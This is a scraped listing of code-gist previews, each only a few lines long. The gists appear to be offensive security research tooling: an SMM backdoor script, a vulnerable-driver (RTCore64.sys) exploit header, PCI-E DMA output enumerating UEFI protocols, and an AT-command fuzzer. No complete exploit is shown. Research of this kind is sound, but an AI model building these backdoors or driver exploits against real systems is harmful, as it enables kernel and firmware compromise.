This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
To find SKPROCESS Policy offset: | |
__int64 __fastcall SkpspFindPolicy(__int64 a1, __int64 a2, int a3, __int64 a4, __int64 a5) | |
{ | |
v5 = a4; | |
v6 = a3; | |
v7 = a2; | |
v8 = a1; | |
v12 = 0i64; | |
v9 = a1 + 0x1B8; // <-- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdlib.h> | |
#include <stdbool.h> | |
#include <irq.h> | |
#include <libbase/uart.h> | |
#include <libbase/console.h> | |
#include <generated/csr.h> | |
#include "adder.h" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import sys, os, time, platform, ctypes | |
from struct import pack, unpack | |
from optparse import OptionParser, make_option | |
import smm_backdoor as bd | |
# how many seconds to wait for VM exit occur | |
VM_EXIT_WAIT = 3 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import sys, os, platform, ctypes, ctypes.wintypes | |
from struct import pack, unpack | |
import smm_backdoor as bd | |
# MSR register used by swapgs | |
IA32_KERNEL_GS_BASE = 0xc0000102 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import sys, os, platform, ctypes | |
from struct import pack, unpack | |
import smm_backdoor as bd | |
try: | |
import capstone |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include "stdafx.h" | |
// vulnerable driver device name | |
#define EXPL_DEVICE_PATH "\\\\.\\Global\\RTCore64" | |
// vulnerable driver service and file name | |
#define EXPL_DRIVER_NAME "RTCore64.sys" | |
#define EXPL_SERVICE_NAME "RTCore64" | |
// vulnerable driver IOCTL codes |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ ./uefi.py | |
[+] Scanning memory range 0x76000000:0xa0000000 | |
[+] Waiting for PCI-E link... | |
[+] PCI-E link with target is up | |
[+] Looking for DXE driver PE image... | |
[+] PE image is at 0x77866000 | |
[+] PE image is at 0x77871000 | |
[+] PROTOCOL_ENTRY address is 0x76bfaa98 | |
[+] Registered UEFI protocols and interfaces: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys, os, mmap, subprocess | |
from struct import pack, unpack | |
from ctypes import * | |
IA32_SYSENTER_ESP = 0x175 | |
IA32_SYSENTER_EIP = 0x176 | |
class PyObj(Structure): | |
_fields_ = [( 'ob_refcnt', c_size_t ), |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"AT_CMD_GRAMMARS": { | |
"+CGSN": { | |
"struct": ["cmd"], | |
"cmd": "+CGSN" | |
}, | |
"+CIND": { | |
"struct": ["cmd"], |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
''' | |
******************************************************************************** | |
AT commands fuzzer based on ATFuzzer code base. | |
* https://github.com/Imtiazkarimik23/ATFuzzer | |
* https://relentless-warrior.github.io/wp-content/uploads/2019/11/atfuzz.pdf |
NewerOlder